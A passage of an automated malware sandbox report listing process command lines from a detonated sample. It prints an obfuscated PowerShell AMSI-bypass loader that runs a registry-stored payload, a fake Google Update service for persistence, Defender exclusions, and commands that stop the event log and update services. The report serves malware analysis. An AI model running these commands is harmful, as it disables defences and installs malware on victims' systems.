                                                        Target ID:18
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\powercfg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                        Imagebase:0x7ff63a330000
                                                        File size:96'256 bytes
                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:19
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\powercfg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                        Imagebase:0x7ff66e660000
                                                        File size:96'256 bytes
                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:20
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:21
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\powercfg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                        Imagebase:0x7ff63a330000
                                                        File size:96'256 bytes
                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:22
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:23
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\powercfg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                        Imagebase:0x7ff63a330000
                                                        File size:96'256 bytes
                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:24
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:25
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:26
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\dialer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\dialer.exe
                                                        Imagebase:0x7ff712e80000
                                                        File size:39'936 bytes
                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:27
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:28
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:29
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OkULRfyuHQtJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$DHHElPDheRwtsc,[Parameter(Position=1)][Type]$RGuqRFFAmI)$xKbDjiiiAOv=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+'yMo'+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('My'+'D'+'el'+[Char](101)+''+[Char](103)+'a'+'t'+''+'e'+''+[Char](84)+'yp'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+'ss'+[Char](44)+'Pu'+'b'+'l'+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+'e'+'a'+'l'+''+'e'+'d,'+[Char](65)+'ns'+'i'+''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+'s',[MulticastDelegate]);$xKbDjiiiAOv.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+'H'+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+'b'+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$DHHElPDheRwtsc).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+','+'Man'+'a'+'g'+[Char](101)+''+[Char](100)+'');$xKbDjiiiAOv.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+'y'+[Char](83)+''+'i'+'g'+','+'N'+[Char](101)+'w'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$RGuqRFFAmI,$DHHElPDheRwtsc).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',Ma'+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $xKbDjiiiAOv.CreateType();}$HPsmfKkDEZPEO=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+'c'+[Char](114)+''+'o'+'s'+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+'U'+'n'+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+'i'+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$AzPrwzsUpDJMwf=$HPsmfKkDEZPEO.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+'P'+[Char](114)+''+[Char](111)+'cA'+'d'+'d'+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PKjZFAJMrKtEHtCAQET=OkULRfyuHQtJ @([String])([IntPtr]);$TwfHJfbEiJESflVXJDRdie=OkULRfyuHQtJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$VJhcAYUztep=$HPsmfKkDEZPEO.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'M'+'od'+[Char](117)+''+[Char](108)+''+'e'+'H'+[Char](97)+''+'n'+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+''+[Char](101)+'l'+[Char](51)+''+'2'+'.'+[Char](100)+'l'+[Char](108)+'')));$pGTzdTbPDPtdSw=$AzPrwzsUpDJMwf.Invoke($Null,@([Object]$VJhcAYUztep,[Object](''+[Char](76)+''+[Char](111)+'a'+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$gmmiBVEmviKAGYOfq=$AzPrwzsUpDJMwf.Invoke($Null,@([Object]$VJhcAYUztep,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+'ua'+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+'c'+''+'t'+'')));$RgMdvyV=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($pGTzdTbPDPtdSw,$PKjZFAJMrKtEHtCAQET).Invoke(''+[Char](97)+'m'+'s'+''+'i'+''+'.'+''+[Char](100)+'l'+[Char](108)+'');$RRZbMqrVsxPNJwFWd=$AzPrwzsUpDJMwf.Invoke($Null,@([Object]$RgMdvyV,[Object]('Am'+[Char](115)+''+'i'+'S'+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+'u'+[Char](102)+'fe'+[Char](114)+'')));$InrlgaQyOp=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gmmiBVEmviKAGYOfq,$TwfHJfbEiJESflVXJDRdie).Invoke($RRZbMqrVsxPNJwFWd,[uint32]8,4,[ref]$InrlgaQyOp);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$RRZbMqrVsxPNJwFWd,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gmmiBVEmviKAGYOfq,$TwfHJfbEiJESflVXJDRdie).Invoke($RRZbMqrVsxPNJwFWd,[uint32]8,0x20,[ref]$InrlgaQyOp);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'T'+'W'+''+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+''+'l'+'er'+'s'+'ta'+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                                                        Imagebase:0x7ff6e3d50000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:30
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:31
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:32
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:33
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:34
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:35
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:36
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:37
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\ProgramData\Google\Chrome\updater.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\ProgramData\Google\Chrome\updater.exe
                                                        Imagebase:0x7ff6931b0000
                                                        File size:5'536'856 bytes
                                                        MD5 hash:1417D38C40D85D1C4EB7FAD3444CA069
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 74%, ReversingLabs
                                                        • Detection: 75%, Virustotal, Browse
                                                        Has exited:true

                                                        General

                                                        Target ID:38
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                        Imagebase:0x7ff6e3d50000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:39
                                                        Start time:22:56:02
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:40
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                        Imagebase:0x7ff70b4f0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:41
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:42
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:43
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:44
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\wusa.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                        Imagebase:0x7ff7c7170000
                                                        File size:345'088 bytes
                                                        MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:45
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\dllhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\dllhost.exe /Processid:{ed3c9ad9-1a05-4753-a177-d35f4db59610}
                                                        Imagebase:0x7ff642ec0000
                                                        File size:21'312 bytes
                                                        MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:46
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:47
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:48
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:49
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:50
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\winlogon.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:winlogon.exe
                                                        Imagebase:0x7ff70f350000
                                                        File size:906'240 bytes
                                                        MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        General

                                                        Target ID:51
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop bits
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:52
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:53
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:54
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:55
                                                        Start time:22:56:05
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\powercfg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                        Imagebase:0x7ff63a330000
                                                        File size:96'256 bytes
                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:56
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\powercfg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                        Imagebase:0x7ff63a330000
                                                        File size:96'256 bytes
                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:57
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:58
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\powercfg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                        Imagebase:0x7ff63a330000
                                                        File size:96'256 bytes
                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:59
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:60
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\powercfg.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                        Imagebase:0x7ff7403e0000
                                                        File size:96'256 bytes
                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:61
                                                        Start time:22:56:06
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
